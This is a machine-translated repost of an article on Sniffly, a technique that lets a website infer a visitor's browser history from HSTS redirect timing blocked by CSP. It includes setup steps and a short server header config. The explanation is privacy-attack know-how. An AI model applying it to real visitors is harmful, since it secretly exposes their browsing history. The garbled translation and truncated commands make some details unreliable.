Sniffly: Uses HSTS and CSP to sniff browser history

Source: Internet
Author: User
Tags http strict transport security nginx server

Sniffly: Uses HSTS and CSP to sniff browser history



Sniffly is an attack by using HSTS (HTTP Strict Transport Security) and Content Security Policy (Content Security Policy). It allows any website to sniff the user's browser history. This technology was tested in Firefox and Chrome browsers.


First, you can use Firefox/Chrome/Opera for the DEMO, but disable HTTPS first.

Demo address: Sniffly (before opening, please confirm whether to use Firefox/Chrome/operabrowser to open it, otherwise it may cause other browsers to crash)

Working Principle


First, we recommend that you read the src/index. js in the source file to understand how Sniffly works.

The following describes how it works:

1. First, the user will first access the webpage embedded with Sniffly; 2. Then, the browser will first attempt to download images from the server using the http protocol; 3. At this time, Sniffly shields image downloads by setting a CSP (Content Filtering Policy) to block redirection from http to https. This is an important step. If the browser completes the https URL request, it will then directly receive the pin code sent by hsts, And the next attack will be difficult to implement. 4. When the image is interrupted by CSP, The onerror processing program will be called. In this case, the onerror processing program tracks and computes the time when the image is redirected from HTTP to HTTPS. If the time is within milliseconds, this means that the browser does not need to send network requests, that is, the user has previously accessed the target domain name. If the time is about 100 milliseconds, this means that the browser needs to send a network request, that is, the user has not accessed the target domain name before.

Find the HSTS host address

Add to the website list to check which host sends the HSTS message header information,

$ cd util$ ./ 
   > results.log

In the initial configuration, there are 100 URLs. You can also use different URL lists for detection based on the actual environment, such as the top 1 million in the Alexa ranking.

The results are processed and classified using the maximum time span, and those with the maximum time span less than one day and pre-downloaded are excluded first.

$ cd util$ ./ 
   > processed.log

After execution, you can copy the host address from process. log to src/index. js.



Access file: // path/to/sniffly/src/index.html in Chrome. In Firefox, tags are obviously not supported for CSP header information. Therefore, you need to create a local network server to respond to csp http response header information. The functional modules of my Nginx server are as follows,

server {    listen 8081;    server_name localhost;    location / {        root /path/to/sniffly/src;        add_header Content-Security-Policy "img-src http:";        index index.html;    }}

Or use the distributed configuration file. htaccess

  Header set Content-Security-Policy "img-src http:"

Or send the header information through php.

Paste the following code snippet at the beginning of the script (remember to change index. php name)



1. Currently, Safari, IE, o, or Chrome (iOS) is not supported. 2. Disable HTTPS. browser extension functions such as HTTPS will confuse the results. 3. Do not use Tor browser, because the time statistics will be rounded to nearly 100 ms. 4. If you have different HSTS presets (because of browsers of earlier versions), you may not see the accurate results.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.